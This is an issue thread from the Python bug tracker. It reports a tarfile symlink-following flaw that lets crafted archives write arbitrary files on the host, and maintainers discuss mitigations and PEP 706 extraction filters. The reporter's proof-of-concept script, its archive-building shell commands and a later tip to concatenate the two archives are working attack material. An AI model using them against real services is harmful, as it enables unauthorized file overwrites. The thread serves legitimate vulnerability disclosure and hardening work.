"tarfile" library will lead to "write any content to any file on the host". #88189

Closed
leveryd mannequin opened this issue May 3, 2021 · 6 comments
Labels
3.7 (EOL) end of life stdlib Python modules in the Lib dir type-security A security issue

Comments

@leveryd
Mannequin

leveryd mannequin commented May 3, 2021

BPO 44023
Nosy @gpshead, @merwok
Files
  • poc.tar.gz

Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.

    GitHub fields:

    assignee = None
    closed_at = None
    created_at = <Date 2021-05-03.17:44:03.787>
    labels = ['type-security', '3.7', 'library']
    title = '"tarfile" library will lead to "write any content to any file on the host".'
    updated_at = <Date 2021-05-08.03:14:09.942>
    user = 'https://bugs.python.org/leveryd'

    bugs.python.org fields:

    activity = <Date 2021-05-08.03:14:09.942>
    actor = 'gregory.p.smith'
    assignee = 'none'
    closed = False
    closed_date = None
    closer = None
    components = ['Library (Lib)']
    creation = <Date 2021-05-03.17:44:03.787>
    creator = 'leveryd'
    dependencies = []
    files = ['50005']
    hgrepos = []
    issue_num = 44023
    keywords = []
    message_count = 3.0
    messages = ['392827', '393219', '393234']
    nosy_count = 3.0
    nosy_names = ['gregory.p.smith', 'eric.araujo', 'leveryd']
    pr_nums = []
    priority = 'normal'
    resolution = None
    stage = None
    status = 'open'
    superseder = None
    type = 'security'
    url = 'https://bugs.python.org/issue44023'
    versions = ['Python 3.7']

    @leveryd
    Mannequin Author

    leveryd mannequin commented May 3, 2021

    If two archives are extracted into the same directory, an attacker can "write any content to any file on the host".

    PoC code is below:

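    import tarfile

    dir_name = "/tmp/anything"

    # Archive 1 holds a symlink test_tar/a -> /tmp/a. Built with:
    #   mkdir test_tar; ln -sv /tmp/a test_tar/a; tar -cvf a.tar.gz test_tar/a
    file1_name = "/tmp/a.tar.gz"

    # Archive 2 holds a regular file under the same member name. Built with:
    #   echo "it is just poc" > /tmp/payload; rm -rf test_tar; mkdir test_tar
    #   cp /tmp/payload test_tar/a; tar -cvf b.tar.gz test_tar/a
    file2_name = "/tmp/b.tar.gz"


    def vuln_tar(tar_path):
        """Extract every member of the archive at tar_path into dir_name."""
        # "r:" reads without compression: `tar -cvf` does not gzip,
        # despite the .gz suffix used in the file names above.
        with tarfile.open(tar_path, "r:") as tar:
            for file_name in tar.getnames():
                tar.extract(file_name, dir_name)


    vuln_tar(file1_name)  # creates the symlink /tmp/anything/test_tar/a
    vuln_tar(file2_name)  # writes through that symlink into /tmp/a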
    

    In this PoC, if a service extracts two attacker-uploaded tar files into "dir_name", the attacker can create "/tmp/a" and write the string "it is just poc" into it.

    @leveryd leveryd mannequin added 3.7 (EOL) end of life stdlib Python modules in the Lib dir type-security A security issue labels May 3, 2021
    @merwok
    Member

    merwok commented May 7, 2021

    Can you contact the security team (info at https://www.python.org/dev/security/ ) directly?

    In general, tarfile (and other Python file functions!) can create files anywhere on the filesystem, provided that the process user has the right permissions. But it seems that you’re talking about an unexpected behaviour leading to unwanted operations, so please send more details about the problem to the team. Thank you for your report!

    @gpshead
    Member

    gpshead commented May 8, 2021

    TL;DR: Extracting a tar file doesn't check whether it is overwriting an existing file. That file could be a symlink to elsewhere, in which case the contents of the symlink's target get clobbered (assuming the target file exists).

    Doing an unlink before opening the destination file during extract (ignoring both success and FileNotFoundError) would avoid this _specific_ case.

    But tarfile is already documented with a warning about untrusted inputs being able to do bad things:

    https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

    Fixing this one serialized case doesn't do anything about other cases or race conditions that we won't claim protection against, so I'm not sure this issue is serious from a stdlib perspective.
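
The unlink-before-open idea above can be sketched outside of tarfile. This is a minimal illustration, not the stdlib's implementation: `write_replacing` and `demo` are hypothetical names, and, as the comment notes, it only addresses the one serialized case, not races or other link tricks.

```python
import os
import tempfile


def write_replacing(path, data):
    """Write data to path after removing whatever entry is already there.

    Hypothetical helper, not part of tarfile. os.unlink removes a symlink
    itself rather than its target, so the write below creates a fresh file.
    """
    try:
        os.unlink(path)
    except FileNotFoundError:
        pass  # nothing to replace
    # "xb" refuses to open if something reappeared at path after the unlink
    with open(path, "xb") as f:
        f.write(data)


def demo():
    """Return (contents of the symlink target, whether dest is still a symlink)."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim")
        with open(victim, "wb") as f:
            f.write(b"original")
        dest = os.path.join(tmp, "a")
        os.symlink(victim, dest)  # stands in for the symlink left by archive 1
        write_replacing(dest, b"it is just poc")
        with open(victim, "rb") as f:
            return f.read(), os.path.islink(dest)
```

Calling `demo()` shows the file behind the symlink is left alone, while the symlink itself is replaced by a regular file. The helper does not handle the case where `path` is a directory.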

    @nascheme
    Member

    This looks like a relevant change from OpenBSD pax:

    Prevent an archive from escaping the current directory by itself
    openbsd/src@6b45b47

    Handling symlinks in general is fraught with danger. See:

    https://lwn.net/Articles/899543/
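
As a rough illustration of the kind of check discussed here, the sketch below flags link members whose target is absolute or climbs out of the extraction root via "..". It is an assumption-laden example, not what OpenBSD pax or tarfile does: `link_escapes` and `make_symlink` are hypothetical helpers, the check is purely lexical, and it ignores member names that are themselves unsafe.

```python
import posixpath
import tarfile


def link_escapes(member):
    """Return True if a link member points outside the extraction root.

    Illustrative check only: it compares names lexically and never
    consults the filesystem.
    """
    if not (member.issym() or member.islnk()):
        return False
    target = member.linkname
    if posixpath.isabs(target):
        return True
    if member.issym():
        # a symlink target is relative to the directory holding the link
        target = posixpath.join(posixpath.dirname(member.name), target)
    # a hard-link target is relative to the archive root
    normalized = posixpath.normpath(target)
    return normalized == ".." or normalized.startswith("../")


def make_symlink(name, linkname):
    """Build a symlink TarInfo in memory (nothing touches the disk)."""
    info = tarfile.TarInfo(name)
    info.type = tarfile.SYMTYPE
    info.linkname = linkname
    return info
```

With the PoC's member, `link_escapes(make_symlink("test_tar/a", "/tmp/a"))` is true, while a link to a sibling such as `"b"` is not flagged.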

    @gpshead
    Member

    gpshead commented Sep 25, 2022

    hah, I enjoy the editorial description of what openbsd does in their comment: openbsd/src@6b45b47#diff-8934d8de794095d2f05a1d6ff3354b371ce2d2e01d0fe4ddf43b853ef5a0e077R460

    @encukou
    Member

    encukou commented May 3, 2023

    PEP-706 (Filter for tarfile.extractall) has been implemented in #102950. See the added docs.

    Python 3.12, and security updates to some earlier releases, will allow users to avoid this issue by changing their code/settings.
    Python 3.12 will emit a warning urging people to do that.
    Python 3.14 will make safer behaviour the default.


    For the original report: note that you don't need to extract twice -- tar members are extracted sequentially, and don't need to have unique names. With the PoC in the first comment, do cat a.tar.gz b.tar.gz > c.tar.gz, and extract just c.tar.gz!
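
To illustrate that member names need not be unique, the sketch below builds one archive in memory with two members named `test_tar/a` (a symlink, then a regular file) and lists them without extracting anything. It constructs the archive with `TarFile.addfile` rather than by concatenating files, and the helper names are hypothetical.

```python
import io
import tarfile


def build_combined_archive(payload=b"it is just poc\n"):
    """Return bytes of one tar archive with two members named test_tar/a."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo("test_tar/a")
        link.type = tarfile.SYMTYPE
        link.linkname = "/tmp/a"
        tar.addfile(link)

        regular = tarfile.TarInfo("test_tar/a")  # same name, regular file
        regular.size = len(payload)
        tar.addfile(regular, io.BytesIO(payload))
    return buf.getvalue()


def describe_members(archive_bytes):
    """List (name, kind) for each member in archive order, without extracting."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:") as tar:
        return [
            (m.name, "symlink" if m.issym() else "file" if m.isfile() else "other")
            for m in tar.getmembers()
        ]
```

`describe_members(build_combined_archive())` lists the same name twice, first as a symlink and then as a file, which is the order in which sequential extraction would process them.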
